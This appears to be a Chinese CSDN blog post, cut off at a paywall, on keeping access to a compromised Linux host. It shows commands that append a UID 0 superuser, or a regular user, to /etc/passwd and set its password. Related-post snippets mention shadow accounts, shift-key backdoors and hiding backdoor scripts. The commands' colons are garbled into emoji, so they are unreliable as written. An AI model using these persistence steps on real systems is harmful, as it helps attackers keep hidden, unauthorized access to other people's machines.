内网渗透-linux权限维持

已于 2023-01-20 10:30:04 修改
阅读量591 收藏 2
点赞数
分类专栏: 内网渗透 文章标签: 安全性测试 web安全 安全
于 2022-08-25 07:54:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126512964
版权

内网渗透-linux权限维持

文章目录

添加用户

UID=0是最高权限的用户,有时候不能被远程登录,可以创建一个普通用户。

正常可以通过 “id” 来查看当前的用户的UID,
在这里插入图片描述

存在交互的shell且允许uid=0的⽤户远程登录
假设是高版本的话,先修改/etc/passwd的内容,在设置对应账户的密码

echo “test❌0:0:😕:/bin/sh” >> /etc/passwd
#增加超级⽤户账号
passwd test
#修改test的密码

在这里插入图片描述
添加成功
这里主要区分是什么服务器 因为在你创建用户 之后你要选择登录 你的ip一定是跟机主原始ip不一致 导致报异地登录等

存在交互的shell不允许uid=0的⽤户远程登录(高版本)

这个时候我们就可以创建一个普通的用户,先修改/etc/passwd的内容,在设置对应账户的密码

echo “xbb❌1000:1000:😕:/bin/sh” >> /etc/passwd
#增加普通⽤户账号

了解本专栏 订阅专栏 解锁全文 超级会员免费看
炫彩@之星
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
渗透—Linux上线
剁椒鱼头没剁椒的博客
06-12 3195
默认情况下CS是不支持上线Linux的,只支持上线Windows,但是再事情的渗透测试过程中,一般企业重用的业务通常都是运行再Linux上的,这就会导致原版的CS无法上线Linux,而这时候可以使用crossC2插件来解决这个问题。
渗透-windows权限维持的方法
最新发布
lza20001103的博客
04-14 1182
渗透-windows权限维持的方法
linux权限维持
weixin_45653478的博客
03-28 924
在过去,我们想要对一个使用者进行认证 (authentication),得要要求用户输入账号口令, 然后透过自行撰写的程序来判断该账号口令是否正确。也因为如此,我们常常得使用不同的机制来判断账号口令,所以搞的一部主机上面拥有多个各别的认证系统,也造成账号口令可能不同步的验证问题!为了解决这个问题因此有了 PAM (Pluggable Authentication Modules, 嵌入式模块) 的机制!
Linux权限维持
2403_82795493的博客
02-26 591
在攻击者利用漏洞获取到某台机器的控制权限之后,会考虑将该机器作为一个持久化的据点,种植一个具备持久化的后门,从而随时可以连接该被控机器进行深入渗透
Linux权限维持(六)
pingan233的博客
02-25 301
# “2”在linux中代表错误输出,“1”在linux中代表标准输出,在此处也就是nohup的输出。#mount --bind命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个目录的访问,并且会将前一个目录路径隐藏起来(注意这里只是隐藏不是删除,数据未发生改变,仅仅是无法访问了)。一般来说我们是做一个正向连接后门,因为反向后门的代码里面没有循环,并不能进行长时间的连接。其中,恶意脚本 dir.py 的内容可以是任何功能的后门,比如上面的监听本地11端口。
linux内渗透1
08-03
综上所述,此过程展示了Linux内渗透的基本步骤,包括漏洞利用、权限提升、信息收集、横向移动以及内资源的探测。同时也揭示了络安全的重要性,尤其是对敏感信息的保护和良好的系统管理实践。对于IT安全从业...
Linux内渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持、Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
渗透测试-提权工具
05-25
渗透测试是信息安全领域中的一个重要环节,主要目的是模拟黑客攻击行为,以发现并修复组织内部络中的安全漏洞。在这个过程中,提权是关键的一环,它指的是在获取了低权限账户后,尝试升级到管理员权限,从而...
EW内渗透
05-06
渗透络安全领域中的一个重要话题,特别是在企业络环境中,内安全的防护与渗透测试是保障业务连续性和数据安全的关键。"EW内渗透"可能是指一种内渗透工具或者一套方法论,用于模拟黑客攻击行为,检测...
安全攻防渗透测试实战指南.pptx
07-01
安全攻防渗透测试实战指南 ...内安全攻防渗透测试实战指南旨在帮助安全人员和渗透测试人员更好地理解内安全攻防的原理和方法,并提供了一些实用的技术和工具来帮助他们更好地进行内渗透测试和安全攻防。
文件权限之默认权限与隐藏权限1
weixin_44799698的博客
09-18 135
文件权限之默认权限与隐藏权限 非纯文本文件:od /bin /usr/bin 普通用户执行的命令 /sbin /usr/sbin 超级用户执行的命令 # cat /usr/bin //会显示乱码 # od -t type 文件 type: a 默认字符输出 c 使用ASCII输出 d 十进制 o 八进制 x 十六进制 # od -t c...
linux root下没有目录权限设置密码,Linux权限管理-特殊权限
weixin_42511602的博客
04-29 514
原标题:Linux权限管理-特殊权限Linux系统特殊权限概述之前我们已经讲过r(读)、w(写)、x(执行)这三种普通全年,但是我们在查询系统文件权限时会发现出现了一些其他的权限字母例:[root@db04 ~]# ll /usr/bin/passwd-rwsr-xr-x. 1 root root 30768 2月 22 2012 /usr/bin/passwd[root@db04 ~]# ll ...
渗透权限维持的方法
https://www.cnblogs.com/zpchcbd/
08-11 4351
一、影子账户 net user admin$ admin /add 具体可以通过注册表查找 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。 解决方法:在SAM文件夹处点击右键—>权限(设置就好了) 二、shift后门 1、先删除缓存C:\WINDOWS\system32\dllcache...
渗透之——权限维持(获取windows、linux密码,安装后门程序)
wsnbbz的博客
03-23 7416
介绍 当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了 目的 由于攻击可能被发现,被发现后可能会被将之前拿到的的webshell清除,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的 获取系统登陆账号密码 windows获取系统登陆账号密码 windows系统账号密码存储位置: C...
渗透 linux
08-18
在Linux系统中进行内渗透,攻击者可以利用一些常见的工具和技术来获取未授权访问、提权或控制其他主机。以下是一些常见的内渗透技术和建议的对策: 1. 弱密码攻击:攻击者可能尝试猜测或暴力破解Linux系统上的密码。对策:确保使用强密码策略,并定期更改密码。禁用不必要的远程登录方式,如SSH密码登录,改为使用公钥身份验证。 2. 服务漏洞利用:攻击者可能利用Linux系统上运行的服务中的已知漏洞进行入侵。对策:定期更新和升级系统和软件包,及时修补已知漏洞。关闭不必要的服务或端口,只保留所需的服务,并根据需要配置防火墙规则。 3. 提权攻击:攻击者可能试图通过利用Linux系统上的特权升级漏洞来获取管理员权限。对策:限制用户的权限,确保每个用户只具有适当的权限。定期检查系统日志,监测异常行为和特权升级尝试。及时安装操作系统和内核的安全更新。 4. 社交工程:攻击者可能使用欺骗、伪装或其他手段来获取用户的敏感信息。对策:加强安全意识培训,教育员工有关社会工程学攻击的风险和防范措施。提醒用户不要随意点击可疑的链接或打开未知来源的附件。 5. 无线络攻击:如果目标络中有无线络,攻击者可能尝试通过无线络入侵内部络。对策:使用强密码和加密协议保护无线络。禁用不必要的无线络功能,并配置合适的防火墙规则。 6. 内部系统扫描:攻击者可能在内中进行系统扫描,探测其他主机的漏洞。对策:配置入侵检测系统(IDS)或入侵防御系统(IPS),监测内部络流量,及时发现和阻止异常活动。 请注意,这些建议只是一些基本的防范措施。实际情况可能因络环境和需求而异。为了确保Linux系统的安全,建议定期进行漏洞扫描、安全审计和渗透测试,并采取相应的安全措施来减少潜在的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值